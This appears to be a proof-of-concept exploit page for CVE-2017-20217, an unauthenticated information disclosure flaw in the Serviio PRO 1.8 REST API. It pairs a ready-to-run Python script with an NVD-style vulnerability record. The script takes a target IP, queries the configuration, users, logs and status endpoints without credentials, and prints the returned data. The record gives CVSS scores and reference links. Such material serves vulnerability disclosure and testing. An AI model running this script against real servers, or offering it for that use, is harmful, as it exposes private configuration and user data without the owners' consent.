CVE-2017-20217

#!/usr/bin/env python3 """ CVE-2017-20217 PoC - Serviio PRO 1.8 Unauthenticated Configuration Access This PoC demonstrates the information disclosure vulnerability in Serviio REST API """ import requests import json import sys def exploit_serviio(target_ip, target_port=23423): """ Exploit the unauthenticated access to Serviio Configuration REST API Args: target_ip: Target Serviio server IP address target_port: Serviio REST API port (default: 23423) """ base_url = f"http://{target_ip}:{target_port}" # Sensitive API endpoints that can be accessed without authentication endpoints = [ "/api/configuration", "/api/users", "/api/logs", "/api/status" ] print(f"[*] Targeting Serviio server at {target_ip}:{target_port}") print("=" * 60) for endpoint in endpoints: try: print(f"\n[*] Accessing endpoint: {endpoint}") url = base_url + endpoint # Send unauthenticated request response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[+] SUCCESS: Retrieved data from {endpoint}") try: data = response.json() print(f"[+] Response data: {json.dumps(data, indent=2)[:500]}") except: print(f"[+] Response text: {response.text[:500]}") elif response.status_code == 401: print(f"[-] Authentication required for {endpoint}") else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("\n[*] PoC execution completed") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2017-20217-poc.py <target_ip> [port]") print("Example: python cve-2017-20217-poc.py 192.168.1.100 23423") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 23423 exploit_serviio(target, port)

{"cve": {"id": "CVE-2017-20217", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:51.090", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Serviio PRO 1.8 contains an information disclosure vulnerability due to improper access control enforcement in the Configuration REST API that allows unauthenticated attackers to access sensitive information. Remote attackers can send specially crafted requests to the REST API endpoints to retrieve potentially sensitive configuration data without authentication."}, {"lang": "es", "value": "Serviio PRO 1.8 contiene una vulnerabilidad de revelación de información debido a una aplicación inadecuada del control de acceso en la API REST de configuración que permite a atacantes no autenticados acceder a información sensible. Atacantes remotos pueden enviar solicitudes especialmente diseñadas a los puntos finales de la API REST para recuperar datos de configuración potencialmente sensibles sin autenticación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "http://www.securitylab.ru/poc/486048.php", "source": "[email protected]"}, {"url": "https://blogs.securiteam.com/index.php/archives/3094", "source": "[email protected]"}, {"url": "https://cxsecurity.com/issue/WLB-2017050022", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/125646", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/142383", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/41958/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/serviio-pro-rest-api-information-disclosure", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php", "source": "[email protected]"}]}}